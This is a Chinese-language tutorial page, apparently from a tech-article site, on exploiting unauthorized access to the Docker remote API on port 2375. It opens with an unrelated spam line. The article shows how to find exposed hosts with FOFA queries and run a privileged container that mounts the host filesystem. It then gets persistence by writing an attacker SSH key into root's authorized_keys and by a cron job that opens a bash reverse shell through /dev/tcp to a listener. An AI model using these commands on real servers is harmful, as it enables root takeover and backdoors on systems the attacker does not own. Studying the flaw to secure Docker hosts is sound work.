欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Docker API 未授權(quán)訪問漏洞問題解析

 更新時(shí)間:2023年03月30日 11:10:52   作者:vitara  
這篇文章主要介紹了Docker API 未授權(quán)訪問漏洞問題解析,本文給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下

因?yàn)閐ocker賦有遠(yuǎn)程的遠(yuǎn)程控制,docker開放了一個(gè)tcp端口2375,如果沒有限制訪問的話,攻擊者就會(huì)通過這個(gè)端口來通過docker未授權(quán)來獲取服務(wù)器權(quán)限。

docker api未授權(quán)訪問漏洞

00x1 漏洞成因

因?yàn)閐ocker賦有遠(yuǎn)程的遠(yuǎn)程控制,docker開放了一個(gè)tcp端口2375,如果沒有限制訪問的話,攻擊者就會(huì)通過這個(gè)端口來通過docker未授權(quán)來獲取服務(wù)器權(quán)限。

00x2 信息收集

FOFA中搜索port = 2375 && status_code = "404"

訪問站點(diǎn)2375端口,顯示

訪問/info目錄,查看版本信息

證明改站點(diǎn)存在docker未授權(quán)訪問漏洞

00x3 漏洞利用

docker -H tcp://ip ps -a 查看容器
dokcer -H tcp:// images 查看鏡像

為了獲取宿主機(jī)的權(quán)限,我們需要把宿主機(jī)的根目錄掛載到docker容器中

docker -H tcp://ip run -it  --privileged=true -v /:/mnt --entrypoint /bin/bash image-id

--privileged=true:使用該參數(shù),container內(nèi)的root擁有真正的root權(quán)限。

-v /:/mnt:將宿主機(jī)的根目錄掛載到/mnt目錄下

--entrypoint /bin/bash:指定鏡像的默認(rèn)入口命令,該入口命令會(huì)在啟動(dòng)容器時(shí)作為根命令執(zhí)行,所有其他傳入值作為該命令的參數(shù),用法ENTRYPOINT command param1 param2

現(xiàn)在就拿到了root權(quán)限,利用方式有很多種

ssh連接

 ssh-keygen -t rsa        //生成一個(gè)ssh公鑰
 cat /root/.ssh/id_rsa.pub       //查看生成的公鑰
 echo "公鑰內(nèi)容" > /mnt/root/.ssh/authorized_keys   //寫公鑰
 ssh root@目標(biāo)ip -i id_rsa    //ssh進(jìn)行連接

寫計(jì)劃任務(wù)

nc -lvvp port 		//開啟監(jiān)聽
echo "* * * * * /bin/bash -i >& /dev/tcp/ip/port 0>&1" >  /mnt/var/spool/cron/root   	///反彈shell

到此這篇關(guān)于Docker API 未授權(quán)訪問漏洞的文章就介紹到這了,更多相關(guān)Docker API 未授權(quán)漏洞內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • docker部署nginx下日志自動(dòng)切割方法實(shí)現(xiàn)

    docker部署nginx下日志自動(dòng)切割方法實(shí)現(xiàn)

    部署Nginx在Docker中時(shí),其日志文件默認(rèn)不會(huì)自動(dòng)切割,與非Docker環(huán)境有所不同,本文介紹了三種日志切割方法,文中通過示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2024-10-10
  • docker安裝部署 onlyoffice的詳細(xì)過程

    docker安裝部署 onlyoffice的詳細(xì)過程

    本文給大家分享docker安裝部署 onlyoffice的詳細(xì)過程,通過圖文并茂實(shí)例相結(jié)合給大家分享安裝Docker Desktop及如何進(jìn)入BIOS設(shè)置CPU的虛擬化,感興趣的朋友一起看看吧
    2021-06-06
  • Docker-compose搭建Redis集群(Sentinel)的實(shí)現(xiàn)

    Docker-compose搭建Redis集群(Sentinel)的實(shí)現(xiàn)

    本文主要介紹了Docker-compose搭建Redis集群(Sentinel)的實(shí)現(xiàn),文中通過示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2023-07-07
  • Docker運(yùn)行hello-world鏡像失敗或超時(shí)的問題

    Docker運(yùn)行hello-world鏡像失敗或超時(shí)的問題

    在安裝Docker并嘗試運(yùn)行hello-world時(shí),可能會(huì)遇到超時(shí)問題,這通常是由于默認(rèn)的鏡像源訪問速度慢造成的,解決這個(gè)問題的辦法是更換鏡像源,雖然許多人推薦使用阿里云的鏡像源,對(duì)Docker hello-world超時(shí)問題感興趣的朋友一起看看吧
    2024-09-09
  • Docker學(xué)習(xí)筆記之Weave實(shí)現(xiàn)跨主機(jī)容器互聯(lián)

    Docker學(xué)習(xí)筆記之Weave實(shí)現(xiàn)跨主機(jī)容器互聯(lián)

    這篇文章主要介紹了Docker學(xué)習(xí)筆記之Weave實(shí)現(xiàn)跨主機(jī)容器互聯(lián),小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨小編過來看看吧
    2018-04-04
  • Docker安裝MySQL8的方法步驟

    Docker安裝MySQL8的方法步驟

    本篇文章主要介紹了Docker安裝MySQL8的方法步驟,小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨小編過來看看吧
    2018-06-06
  • 使用docker指令如何刪除所有不再使用的鏡像

    使用docker指令如何刪除所有不再使用的鏡像

    這篇文章主要介紹了使用docker指令如何刪除所有不再使用的鏡像問題,具有很好的參考價(jià)值,希望對(duì)大家有所幫助,如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2024-06-06
  • MySQL docker容器數(shù)據(jù)更新統(tǒng)計(jì)shell腳本代碼方式

    MySQL docker容器數(shù)據(jù)更新統(tǒng)計(jì)shell腳本代碼方式

    本文介紹了如何創(chuàng)建和配置一個(gè)腳本文件,使其能夠每隔一小時(shí)執(zhí)行一次,用于更新MySQL統(tǒng)計(jì)信息,腳本使用Docker來執(zhí)行MySQL命令,并將結(jié)果保存到文件中,文章還強(qiáng)調(diào)了權(quán)限設(shè)置和配置定時(shí)任務(wù)的步驟
    2025-01-01
  • Docker刪除已存在的鏡像的實(shí)現(xiàn)

    Docker刪除已存在的鏡像的實(shí)現(xiàn)

    本文主要介紹了Docker刪除已存在的鏡像的實(shí)現(xiàn),刪除已存在的 Docker 鏡像,可以使用 docker rmi 命令,下面就來詳細(xì)的介紹一下使用步驟,感興趣的可以了解一下
    2023-08-08
  • PIP安裝docker-compose超時(shí)問題解決方案

    PIP安裝docker-compose超時(shí)問題解決方案

    這篇文章主要介紹了PIP安裝docker-compose超時(shí)問題解決方案,文中通過示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友可以參考下
    2020-09-09

最新評(píng)論